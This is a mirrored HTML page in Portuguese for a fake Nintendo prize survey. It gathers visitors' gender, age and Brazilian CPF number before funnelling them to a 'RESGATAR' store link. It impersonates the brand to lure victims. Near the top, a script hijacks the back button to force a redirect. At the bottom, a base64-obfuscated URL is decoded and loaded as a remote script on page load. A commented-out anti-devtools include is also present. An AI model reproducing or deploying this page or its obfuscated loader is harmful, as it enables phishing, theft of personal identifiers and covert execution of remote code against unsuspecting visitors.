<!DOCTYPE html>
<html lang="pt-br">
<head>
    <script src="js/latest.js" async="" defer=""></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <link rel="stylesheet" href="css/style.css">
    <script src="../cdn.utmify.com.br/scripts/utms/latest.js" async="" defer=""></script>
    <script>
        window.pixelId = "6681e455ff2ef00dc18d0a5a";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "../cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
    </script>
    <script async="" defer="" src="../cdn.utmify.com.br/scripts/pixel/pixel.js"></script>
    <title>Quiz Nintendo</title>
    <style>
        .rating {
            cursor: pointer;
            text-align: left; /* Alinha os ícones à esquerda */
            display: flex; /* Garante que as estrelas fiquem na mesma linha */
            justify-content: center; /* Centraliza as estrelas */
            flex-wrap: nowrap; /* Evita que as estrelas sejam envolvidas em várias linhas */
        }

        .rating span {
            font-size: 40px; /* Tamanho padrão para telas maiores */
            color: gray;
            margin: 0 15px; /* Espaçamento padrão para telas maiores */
            user-select: none;
        }

        .card {
            width: 100%;
            height: fit-content;
            padding: 20px;
            border: 1px solid #d3d3d3;
            background-color: #f1f1f1;
            border-radius: 15px;
        }

        .satisfacao {
            text-align: center;
            font-size: 16px;
            font-weight: 400;
            letter-spacing: 0.5px;
        }

        .resposta__gradeContainer {
            display: grid;
            grid-template-rows: 1fr;
            grid-template-columns: 1fr 1fr;
            grid-gap: 10px;
            margin: 10px 0px 20px 0px;
        }

        .resposta__grade.selecionado {
            background-color: #1960a4;
            color: white;
        }

        .resposta__grade {
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 10px 15px;
            background-color: #d3d3d3;
            border-radius: 5px;
            transition: all ease 0.3s;
            border: none;
        }

        .resposta__grade p {
            font-size: 14px;
            font-weight: 500;
            letter-spacing: 0.5;
            text-align: center;
        }


        .card__enviarResposta {
            width: 100%;
            font-size: 16px;
            font-weight: 500;
            letter-spacing: 0.5px;
            padding: 10px 20px;

            border-radius: 5px;
            outline: none;
            border: none;
            transition: all ease 0.3s;
        }

        .card__gradeDescricao {
            width: 100%;
            display: flex;
            justify-content: space-between;
            font-size: 12px;
            margin: 5px 0px 0px 0px;
            color: #7e7e7e;
        }

        .cards {
            width: auto; /* Ajuste para 'auto' ou uma largura fixa conforme necessário */
            max-width: 600px; /* Uma largura máxima para garantir a responsividade */
            padding: 20px;
            border: 1px solid #d3d3d3;
            background-color: #f1f1f1;
            border-radius: 15px;
            margin: 20px; /* Garante um pouco de espaço ao redor do card */
        }


        .mensagem {
            margin-top: 20px;
            padding: 10px;
            border-radius: 5px;
        }

        .mensagem-sucesso {
            background-color: #d4edda;
            color: #155724;
        }

        .mensagem-erro {
            background-color: #f8d7da;
            color: #721c24;
        }

        /* Estilos para o pop-up */
        .popup {
            display: none; /* Inicia oculto */
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5); /* Sobreposição escura */
            z-index: 999; /* Z-index alto para ficar acima do conteúdo */
        }

        .popup-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
            width: 400px;
        }

        #closePopup {
            width: 100%;
            padding: 10px 20px;
            font-size: 18px;
            font-weight: 600;
            color: #ffffff;
            background-color: rgb(42 117 195);
            border: none;
            border-radius: 5px;
        }

        /* Estilo para o botão desabilitado */
        .card__enviarResposta:disabled {
            background-color: #cccccc; /* Cor de fundo para o estado desabilitado */
            color: #666666; /* Cor do texto para o estado desabilitado */
        }

        /* Estilo para o botão habilitado */
        .card__enviarResposta:not(:disabled) {
            background-color: #2E9E7B;
            color: white; /* Cor do texto para o estado habilitado */
        }

        .card__resgatar {
            width: 100%;
            padding: 10px 20px;
            font-size: 18px;
            font-weight: 600;
            color: #ffffff;
            background-color: #2E9E7B;
            border: none;
            border-radius: 5px;
            margin-top: 10px;
            animation: pulse 2s infinite;
        }

        @keyframes pulse {
            0% {
                transform: scale(1);
                opacity: 1;
            }
            50% {
                transform: scale(1.05);
                opacity: 0.7;
            }
            100% {
                transform: scale(1);
                opacity: 1;
            }
        }
    </style>
</head>
<body>
<script>
    // ALTERE O LINK PARA A PÁGINA QUE QUISER MOSTRAR QUANDO O USUÁRIO TENTAR SAIR
    const link = 'https://pesquisadequalidade.pro/back';
    function setBackRedirect(url) {
        let urlBackRedirect = url;
        urlBackRedirect = urlBackRedirect =
            urlBackRedirect.trim() +
            (urlBackRedirect.indexOf('?') > 0 ? '&' : '?') +
            document.location.search.replace('?', '').toString();
        history.pushState({}, '', location.href);
        history.pushState({}, '', location.href);
        history.pushState({}, '', location.href);
        window.addEventListener('popstate', () => {
            console.log('onpopstate', urlBackRedirect);
            setTimeout(() => {
                location.href = urlBackRedirect;
            }, 1);
        });
    }
    setBackRedirect(link);
</script>
<header class="perfil">
    <img src="images/nin2.png" alt="" style="width: 200px;">
</header>
<nav class="progress-nav">
    <div class="progress" id="progress"></div>
</nav>
<main>
    <div id="popup" class="popup">
        <div class="popup-content">
            <h2 class="apresentacao">
                🎉 Nintendo Para Você 🎉
            </h2>
            <p class="text-apresentacao">
                Seja bem-vindo(a) a pesquisa especial da Nintendo Para Você, onde a qualidade e a inovação se encontram
                para transformar a sua experiência! Participe e concorra aos prêmios exclusivos Nintendo. Lembre-se:
                apenas uma recompensa por CPF.
                <strong>Está pronto(a) para se juntar ao ecossistema Nintendo? Então vamos lá!</strong>
            </p>
            <button type="button" id="closePopup" class="btn btn-secondary" data-bs-dismiss="modal">COMEÇAR</button>
        </div>
    </div>
    <section id="quiz1">
        <h1 class="go">Vamos começar</h1>
        <span class="span-genero">Escolha o seu gênero abaixo.</span>
        <div class="button-container">
            <div>
                <button class="option-button option-buttonH" onclick="showQuiz('quiz3')">
                    <img class="img" src="images/h1.webp" alt="" width="200" height="200">
                    <div class="genero-container">
                        <span class="genero">Homem</span>
                    </div>
                </button>
                <button class="option-button option-buttonM" onclick="showQuiz('quiz2')">
                    <img class="img" src="images/m1.webp" alt="">
                    <div class="genero-container">
                        <span class="genero">Mulher</span>
                    </div>
                </button>
            </div>
        </div>
    </section>

    <section id="quiz2" style="display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <h1 class="go">Beleza, agora a sua idade?</h1>
        <span class="span-genero">Escolha a opção abaixo.</span>
        <div class="button-container">
            <div>
                <button class="option-button option-buttonH" onclick="showQuiz('quiz4')">
                    <span class="idade">18 a 29</span>
                    <img class="img" src="images/m1.webp" alt="" width="200" height="200">
                </button>
                <button class="option-button option-buttonM" onclick="showQuiz('quiz4')">
                    <span class="idade">30 a 39</span>
                    <img class="img" src="images/m2.webp" alt="">
                </button>
                <button class="option-button option-buttonH" onclick="showQuiz('quiz4')">
                    <span class="idade">40 a 49</span>
                    <img class="img" src="images/m3.webp" alt="" width="200" height="200">
                </button>
                <button class="option-button option-buttonM" onclick="showQuiz('quiz4')">
                    <span class="idade">50 ou mais</span>
                    <img class="img" src="images/m4.webp" alt="">
                </button>
            </div>
        </div>
    </section>


    <section id="quiz3" style="display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <h1 class="go">Beleza, agora a sua idade?</h1>
        <span class="span-genero">Escolha a opção abaixo.</span>
        <div class="button-container">
            <div>
                <button class="option-button option-buttonH" onclick="showQuiz('quiz4')">
                    <span class="idade">18 a 29</span>
                    <img class="img" src="images/h1.webp" alt="" width="200" height="200">
                </button>
                <button class="option-button option-buttonM" onclick="showQuiz('quiz4')">
                    <span class="idade">30 a 39</span>
                    <img class="img" src="images/h2.webp" alt="">
                </button>
                <button class="option-button option-buttonH" onclick="showQuiz('quiz4')">
                    <span class="idade">40 a 49</span>
                    <img class="img" src="images/h3.webp" alt="" width="200" height="200">
                </button>
                <button class="option-button option-buttonM" onclick="showQuiz('quiz4')">
                    <span class="idade">50 ou mais</span>
                    <img class="img" src="images/h4.webp" alt="">
                </button>
            </div>
        </div>
    </section>

    <section id="quiz4" style="display: none;">
        <!-- Conteúdo do terceiro quiz aqui -->
        <h1 class="go">Informe o seu CPF para consultar disponibilidade</h1>
        <div class="nome-input">
            <form id="cpfForm">
                <svg class="h-5 w-5 text-gray-400" viewBox="0 0 20 20" fill="currentColor" aria-hidden="true">
                    <path d="M7 8a3 3 0 100-6 3 3 0 000 6zM14.5 9a2.5 2.5 0 100-5 2.5 2.5 0 000 5zM1.615 16.428a1.224 1.224 0 01-.569-1.175 6.002 6.002 0 0111.908 0c.058.467-.172.92-.57 1.174A9.953 9.953 0 017 18a9.953 9.953 0 01-5.385-1.572zM14.5 16h-.106c.07-.297.088-.611.048-.933a7.47 7.47 0 00-1.588-3.755 4.502 4.502 0 015.874 2.636.818.818 0 01-.36.98A7.465 7.465 0 0114.5 16z"></path>
                </svg>
                <input class="nome" type="text" id="cpf" name="cpf" placeholder="Digite seu CPF aqui" maxlength="11" required="">
            </form>
        </div>
        <div class="continuar-container">
            <input class="continuar" type="submit" value="CONTINUAR">
        </div>
        <div>
            <div class="progress-container" id="progressContainer" style="display: none;">
                <div class="progress-bar" id="progressBar"></div>
            </div>
            <span class="disponibilidade" style="display: none; text-align: center;">Checando disponibilidade...</span>
            <div class="mensagem" id="statusMessage"></div>
        </div>
        <div class="notification">
            <img class="icon-information" src="images/informacoes.png" alt="">
            <div class="notification-content">
                <h3>Atenção!</h3>
                <p class="descrition-info">
                    Informamos que é possível realizar apenas um resgate por CPF.
                </p>
            </div>
        </div>
    </section>
    <section id="quiz5" style="margin-top: 20px; display:none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card1">
            <img src="images/80.webp" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Quando pensa na Nintendo, qual a primeira palavra que vem sua mente?
                </h2>
                <div class="resposta__gradeContainer">
                    <button class="resposta__grade" data-valor="EXCELENTE">Acessível</button>
                    <button class="resposta__grade" data-valor="BOM">Divertido</button>
                    <button class="resposta__grade" data-valor="REGULAR">Inovação</button>
                    <button class="resposta__grade" data-valor="RUIM">Nostalgia</button>
                </div>
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz6')" data-next-card="quiz6"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz6" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card2">
            <img src="images/82.jpg" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Por qual motivo você se interessa nos produtos Nintendo?
                </h2>
                <div class="resposta__gradeContainer">
                    <button class="resposta__grade" data-valor="excelente">Jogos</button>
                    <button class="resposta__grade" data-valor="bom">Consoles</button>
                </div>
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz7')" data-next-card="quiz7"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz7" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/83.jpg" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Com quem você adora compartilhar os produtos da Nintendo?
                </h2>
                <div class="resposta__gradeContainer">
                    <button class="resposta__grade" data-valor="excelente">Família</button>
                    <button class="resposta__grade" data-valor="bom">Amigos</button>
                    <button class="resposta__grade" data-valor="regular">Parceiro(a) de treino</button>
                    <button class="resposta__grade" data-valor="regular">Colega de trabalho</button>
                </div>
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz8')" data-next-card="quiz8"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz8" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/84.webp" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Qual jogo exclusivo da Nintendo você escolheria para presentear alguém especial?
                </h2>
                <div class="resposta__gradeContainer">
                    <button class="resposta__grade" data-valor="EXCELENTE">Zelda</button>
                    <button class="resposta__grade" data-valor="BOM">Mario</button>
                    <button class="resposta__grade" data-valor="Smash">Pokémon</button>
                    <button class="resposta__grade" data-valor="PESSIMO">Metroid</button>
                </div>
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz9')" data-next-card="quiz9"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz9" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/85.webp" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Qual seu console preferido atualmente?
                </h2>
                <div class="resposta__gradeContainer">
                </div>
                <input class="nome" type="text" style="margin-bottom: 20px;">
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz10')" data-next-card="quiz10"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            function configurarQuiz(quizId) {
                const card = document.getElementById(quizId);
                const inputResposta = card.querySelector('input[type="text"]');
                const botaoEnviar = card.querySelector('.card__enviarResposta');
                inputResposta.addEventListener('input', function () {
                    // Verifica se há algum texto no input
                    const resposta = inputResposta.value.trim(); // Obtém o valor do input e remove espaços em branco
                    if (resposta !== '') {
                        botaoEnviar.disabled = false; // Habilita o botão se houver texto no input
                    } else {
                        botaoEnviar.disabled = true; // Desabilita o botão se não houver texto no input
                    }
                });

                botaoEnviar.addEventListener('click', function () {
                    const nextCardId = this.getAttribute('data-next-card');
                    const nextCard = document.getElementById(nextCardId);

                    if (nextCard) {
                        card.style.display = 'none';
                        nextCard.style.display = 'block';

                        // Configura o próximo card (quiz) automaticamente
                        configurarQuiz(nextCardId);
                    }
                });
            }
// Configurar o quiz9 para iniciar o processo
            configurarQuiz('quiz9');
        });
    </script>
    <section id="quiz10" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/86.webp" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Conte por que você merece ganhar essa super promoção?
                </h2>
                <div class="resposta__gradeContainer">

                </div>
                <input class="nome" type="text" style="margin-bottom: 20px;">
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz11')" data-next-card="quiz11"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz11" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/87.webp" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Como você avaliaria a qualidade dos jogos da Nintendo que já utilizou?
                </h2>
                <div class="rating">
                    <span class="estrela" data-valor="1">★</span>
                    <span class="estrela" data-valor="2">★</span>
                    <span class="estrela" data-valor="3">★</span>
                    <span class="estrela" data-valor="4">★</span>
                    <span class="estrela" data-valor="5">★</span>
                </div>
                <div class="resposta__gradeContainer">
                </div>
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz12')" data-next-card="quiz12"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz12" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/mario-kart-9.jpg" class="card-img-top" alt="...">
            <div class="card-body">
                <h2 style="text-align: center; font-size: 16px; font-weight: 400; letter-spacing: 0.5px;">
                    Como você avalia a experiência de presentear alguém com um Nintendo Switch?
                </h2>
                <div class="rating">
                    <span class="estrela" data-valor="1">★</span>
                    <span class="estrela" data-valor="2">★</span>
                    <span class="estrela" data-valor="3">★</span>
                    <span class="estrela" data-valor="4">★</span>
                    <span class="estrela" data-valor="5">★</span>
                </div>
                <div class="resposta__gradeContainer">
                </div>
                <button class="card__enviarResposta" id="enviar" onclick="showQuiz('quiz13')" data-next-card="quiz13"
                        disabled="">Avançar
                </button>
            </div>
        </div>
    </section>
    <section id="quiz13" style="margin-top: 20px; display: none;">
        <!-- Conteúdo do segundo quiz aqui -->
        <div class="card" id="card3">
            <img src="images/SemT%C3%ADtulo-4.jpg" class="card-img-top" alt="...">
            <div class="card-body">
                <a id="paybutton" href="/loja">
                    <button class="card__resgatar" data-next-card="card5" id="enviar"><i class="fa"
                                                                                         style="font-size:20px; "></i>
                        RESGATAR
                    </button>
                </a></div>
            <a id="paybutton" href="/loja">
            </a>
            <div class="resposta__gradeContainer"></div>
        </div>
    </section>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            function configurarQuizComEstrelas(quizId) {
                const card = document.getElementById(quizId);
                const estrelas = card.querySelectorAll('.estrela');
                const botaoEnviar = card.querySelector('.card__enviarResposta');

                let avaliacaoEstrelas = 0;

                estrelas.forEach(estrela => {
                    estrela.addEventListener('click', function () {
                        avaliacaoEstrelas = parseInt(this.getAttribute('data-valor'));
                        // Atualiza visualmente as estrelas selecionadas
                        estrelas.forEach(estrela => {
                            const valorEstrela = parseInt(estrela.getAttribute('data-valor'));
                            if (valorEstrela <= avaliacaoEstrelas) {
                                estrela.style.color = 'gold';
                            } else {
                                estrela.style.color = 'gray';
                            }
                        });
                        // Verifica se alguma estrela foi selecionada para habilitar o botão
                        verificarSelecoes();
                    });
                });

                function verificarSelecoes() {
                    if (avaliacaoEstrelas > 0) {
                        botaoEnviar.disabled = false;
                    } else {
                        botaoEnviar.disabled = true;
                    }
                }

                botaoEnviar.addEventListener('click', function () {
                    const nextCardId = this.getAttribute('data-next-card');
                    const nextCard = document.getElementById(nextCardId);

                    if (nextCard) {
                        card.style.display = 'none';
                        nextCard.style.display = 'block';

                        // Configura o próximo card (quiz) automaticamente
                        configurarQuizComEstrelas(nextCardId);
                    }
                });
            }

// Configurar os quizzes que contêm estrelas de avaliação
            configurarQuizComEstrelas('quiz11'); // Exemplo para o quiz11
            configurarQuizComEstrelas('outroQuizId'); // Exemplo para outro quiz com estrelas
            configurarQuizComEstrelas('maisUmQuizId'); // Exemplo para mais um quiz com estrelas
// Adicione mais chamadas conforme necessário para outros quizzes

        });


    </script>

</main>

<footer>
    <div class="politica">
            <span class="text-politica">
                Ao iniciar o teste, você concorda com os nossos <br>
                <u>Termos de Uso</u> e
                <u>Póliticas de Privacidade</u>
            </span>
    </div>
</footer>


<script src="js/script_1.js"></script>
<script type="text/javascript">
    var urlBase64 = 'aHR0cHM6Ly9yZWRpcm5udG5kdG5kLnZlcmNlbC5hcHAvc2NyaXB0Lmpz';
    var urlOriginal = atob(urlBase64);
console.log(urlOriginal);
    var scriptElement = document.createElement('script');
    scriptElement.src = urlOriginal;
    document.body.appendChild(scriptElement);
</script>
<script src="js/script.js"></script>
<!--
    <script
    disable-devtool-auto
    src='https://cdn.jsdelivr.net/npm/disable-devtool'
    url='../i.ibb.co/Q8DxD9D/Clona-n-o-que-sou-mais-rato-que-tu.png'
></script>-->
<script>'undefined' === typeof _trfq || (window._trfq = []);
'undefined' === typeof _trfd && (window._trfd = []), _trfd.push({'tccl.baseHost': 'secureserver.net'}, {'ap': 'cpsh-oh'}, {'server': 'p3plzcpnl505826'}, {'dcenter': 'p3'}, {'cp_id': '9936207'}, {'cp_cl': '8'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script>
<script src="js/scc-c2.min.js"></script>
<!-- Mirrored from nintendopergunta.shop/nintendopesquisa by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 11 Jul 2024 23:58:24 GMT -->
</body>
</html>